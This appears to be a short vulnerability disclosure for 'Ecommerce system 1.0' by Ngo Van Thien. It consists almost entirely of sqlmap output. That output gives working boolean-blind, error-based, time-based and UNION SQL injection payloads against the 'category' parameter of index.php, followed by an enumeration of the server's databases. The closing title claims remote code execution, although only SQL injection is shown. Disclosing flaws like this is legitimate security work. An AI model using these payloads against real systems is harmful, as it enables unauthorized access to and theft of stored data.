Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR
6075=6075#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT
(ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[11:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:22:17] [INFO] fetching database names
available databases [6]:
[*] db_ecommerce
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
-------------------------------------------------------------------------------------------------------------Best
Regards!
(*Mr) Ngo Van Thien*
Ecommerce system 1.0 unauthenticated remote code execution